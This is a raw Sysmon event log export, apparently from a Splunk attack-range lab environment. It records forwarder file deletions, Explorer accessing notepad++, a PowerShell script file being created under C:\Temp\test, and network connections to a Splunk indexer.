Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43431F8BEE59D97236AF8A6616151604,SHA256=6CC33134B739814DD4CE6997F7804D4DC45662B6E3907D52BF35A3B32A6C4828,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.170{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F39BDFEB33C633BB46ED5479B22AA819,SHA256=ACEC3CC742639A7303AA60873BA02E67678DCC45A9F4B024AB9574D6DAD704C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.138{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\new 1@2021-07-12_074744MD5=13F64474E1704F5DD848BB968A1CA87C,SHA256=9D9D45D8070CB6B799B711375A182A8B4695DE1E55B5B2C2C1F0DD972BEF7ACC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.136{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1139CFC48B03BED3D70752E2B9978E50,SHA256=122FFFBDC4A76E8D80EAC94E46BC0B0BA6E12FD729137DE3E1EE1953591C02A3,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001047525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.103{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exeC:\Temp\test\sd2.ps12021-07-12 07:48:31.886 10341000x80000000000000001047524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.017{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 
10341000x80000000000000001047521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 
10341000x80000000000000001047518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 
10341000x80000000000000001047515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 
10341000x80000000000000001047512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 23542300x8000000000000000806925Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:33.801{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4D7F117B9824FDFB5FC34F9400094D2,SHA256=9E937D38FE1CC7786D39ADE2CCE3CA5BEEE9E57322905EB1F29190D674C186CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:33.117{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56A6B6D79C361CA3B61E75113613E2D4,SHA256=C7C7EC6EE330F015BBD2BC571B0DC3D29E68E38F81DA8F5812622AA924C8193C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806927Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:34.806{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C024576196DED93302CC0FFF2879B805,SHA256=B3220DE351E3D9395E2053F3E75700C51827AD5AAC6AE8AF67B1A51130357BC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:34.154{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=159806411A868D965135C313275BEB3F,SHA256=440AFC75AD98F6C9C467632DB1DB1E16F12F2AE3F097EB364FF37762A8855D8E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806926Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:33.371{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57217-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806928Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:35.821{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDAB76836988648663EF658D96AF35E4,SHA256=D506A3BF525AF00EF8F8438B9D78BAC4A1D470BB7F502CFAFE6E1C2872C6D755,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001047531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:35.185{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54E632766D8D96EF1253BCFA0C71FE9B,SHA256=528B8B49A796F58B61720B24719FF31C2CDF6B8FDEDB62B2D7C9C541DF54BBFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806929Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:36.837{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E83A8E78A7D44B7FE29CD4F6A2190A4B,SHA256=70A4CCDE2718260F20848889407B4144C6CBEEE41A66514219411BD44580D299,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.620{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50970-false10.0.1.12-8000- 23542300x80000000000000001047532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:36.215{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AA6B52D7A5FF4ED150E7C58FE986FB4,SHA256=CA5EB5696A6339BE667F63C2541F97918C8348CDF9F4BDA76324464D6AEB7E58,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806930Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:37.853{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3452B609B16326EA53314AD1C449A509,SHA256=0CBA9FD1DBC2ADA64C974DED6F1FF5B687BEAF7025814CCF21925A32A8DD065F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:37.233{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DD1CDB246847B4D7E2B96466610A0E8,SHA256=5B1150B080E738CBFF03ADE00A8D138BB72A487425CC878B8DDCD0924C9DD18B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806931Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:38.868{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B2460DD1EB1BCF39680C51424420EFC,SHA256=1116C06D4C28CABC0B53F6938D58B413641471A64081DD3D796EE79B84EB5B35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:38.498{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL 